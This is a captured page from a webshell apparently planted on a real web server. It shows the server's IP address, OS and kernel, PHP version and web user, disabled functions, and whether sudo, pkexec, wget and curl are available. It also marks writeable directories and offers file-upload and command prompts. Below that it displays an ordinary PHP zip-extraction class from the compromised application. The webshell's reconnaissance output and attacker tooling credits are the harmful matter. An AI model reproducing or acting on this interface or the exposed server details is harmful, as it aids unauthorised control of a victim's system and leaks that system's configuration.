403Webshell
Server IP : 103.161.17.216  /  Your IP : 216.73.216.1
Web Server : nginx/1.18.0
System : Linux tipsysaigoncharming 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/app.houseland.info/application/services/zip/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/app.houseland.info/application/services/zip/Unzip.php
<?php

namespace app\services\zip;

defined('BASEPATH') or exit('No direct script access allowed');

use app\services\zip\ExtractException;

@ini_set('memory_limit', '256M');
@ini_set('max_execution_time', 240);

class Unzip
{
    private $throwExceptionOnInvalidFileName = true;

    /**
     * @var array
     */
    public static $statusStrings = [
        \ZipArchive::ER_OK          => 'No error',
        \ZipArchive::ER_MULTIDISK   => 'Multi-disk zip archives not supported',
        \ZipArchive::ER_RENAME      => 'Renaming temporary file failed',
        \ZipArchive::ER_CLOSE       => 'Closing zip archive failed',
        \ZipArchive::ER_SEEK        => 'Seek error',
        \ZipArchive::ER_READ        => 'Read error',
        \ZipArchive::ER_WRITE       => 'Write error',
        \ZipArchive::ER_CRC         => 'CRC error',
        \ZipArchive::ER_ZIPCLOSED   => 'Containing zip archive was closed',
        \ZipArchive::ER_NOENT       => 'No such file',
        \ZipArchive::ER_EXISTS      => 'File already exists',
        \ZipArchive::ER_OPEN        => 'Can\'t open file',
        \ZipArchive::ER_TMPOPEN     => 'Failure to create temporary file',
        \ZipArchive::ER_ZLIB        => 'Zlib error',
        \ZipArchive::ER_MEMORY      => 'Malloc failure',
        \ZipArchive::ER_CHANGED     => 'Entry has been changed',
        \ZipArchive::ER_COMPNOTSUPP => 'Compression method not supported',
        \ZipArchive::ER_EOF         => 'Premature EOF',
        \ZipArchive::ER_INVAL       => 'Invalid argument',
        \ZipArchive::ER_NOZIP       => 'Not a zip archive',
        \ZipArchive::ER_INTERNAL    => 'Internal error',
        \ZipArchive::ER_INCONS      => 'Zip archive inconsistent',
        \ZipArchive::ER_REMOVE      => 'Can\'t remove file',
        \ZipArchive::ER_DELETED     => 'Entry has been deleted',
    ];

    /**
     * Make sure target path ends in '/'
     *
     * @param string $path
     *
     * @return string
     */
    private function fixPath($path)
    {
        if (substr($path, -1) === '/') {
            $path .= '/';
        }

        return $path;
    }

    /**
     * Open .zip archive
     *
     * @param string $zipFile
     *
     * @return \ZipArchive
     */
    private function openZipFile($zipFile)
    {
        $zipArchive = new \ZipArchive;
        if ($zipArchive->open($zipFile) !== true) {
            throw new \Exception('Failed to open zip file ' . $zipFile);
        }

        return $zipArchive;
    }

    /**
     * Extract list of filenames from .zip
     *
     * @param \ZipArchive $zipArchive
     *
     * @return array
     */
    private function extractFilenames(\ZipArchive $zipArchive)
    {
        $filenames = [];
        $fileCount = $zipArchive->numFiles;
        for ($i = 0; $i < $fileCount; $i++) {
            if (($filename = $this->extractFilename($zipArchive, $i)) !== false) {
                $filenames[] = $filename;
            }
        }

        return $filenames;
    }

    /**
     * Test for valid filename path
     *
     * The .zip file is untrusted input.  We check for absolute path (i.e., leading slash),
     * possible directory traversal attack (i.e., '..'), and use of PHP wrappers (i.e., ':').
     *
     * @param string $path
     *
     * @return boolean
     */
    private function isValidPath($path)
    {
        $pathParts = explode('/', $path);
        if (!strncmp($path, '/', 1) ||
            array_search('..', $pathParts) !== false ||
            strpos($path, ':') !== false) {
            return false;
        }

        return true;
    }

    /**
     * Extract filename from .zip
     *
     * @param \ZipArchive $zipArchive Zip file
     * @param integer     $fileIndex  File index
     *
     * @return string
     */
    private function extractFilename(\ZipArchive $zipArchive, $fileIndex)
    {
        $entry = $zipArchive->statIndex($fileIndex);
        // convert Windows directory separator to Unix style
        $filename = str_replace('\\', '/', $entry['name']);

        if (substr($entry['name'], 0, 9) === '__MACOSX/') { // Skip the OS X-created __MACOSX directory
            return false;
        }

        if ($this->isValidPath($filename)) {
            return $filename;
        }

        if ($this->throwExceptionOnInvalidFileName) {
            throw new \Exception('Invalid filename path in zip archive');
        }
    }

    /**
     * Get error
     *
     * @param integer $status ZipArchive status
     *
     * @return string
     */
    private function getError($status)
    {
        $statusString = isset($this->statusStrings[$status])
            ? $this->statusStrings[$status]
            :'Unknown status';

        return $statusString . '(' . $status . ')';
    }

    /**
     * Whether to throw exception error when invalid file name is detected
     * @param  boolean $bool
     * @return app\services\zip\Unzip
     */
    public function throwExceptionOnInvalidFileName($bool)
    {
        $this->throwExceptionOnInvalidFileName = $bool;

        return $this;
    }

    /**
     * Extract zip file to target path
     *
     * @param string $zipFile    Path of .zip file
     * @param string $targetPath Extract to this target (destination) path
     *
     * @return mixed Array of filenames corresponding to the extracted files
     *
     * @throw \Exception
     */
    public function extract($zipFile, $targetPath)
    {
        $zipArchive = $this->openZipFile($zipFile);
        $targetPath = $this->fixPath($targetPath);
        $filenames  = $this->extractFilenames($zipArchive);

        if ($zipArchive->extractTo($targetPath, $filenames) === false) {
            throw new ExtractException($this->getError($zipArchive->status));
        }

        unset($filenames);
        $zipArchive->close();
        unset($zipArchive);

        return true;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit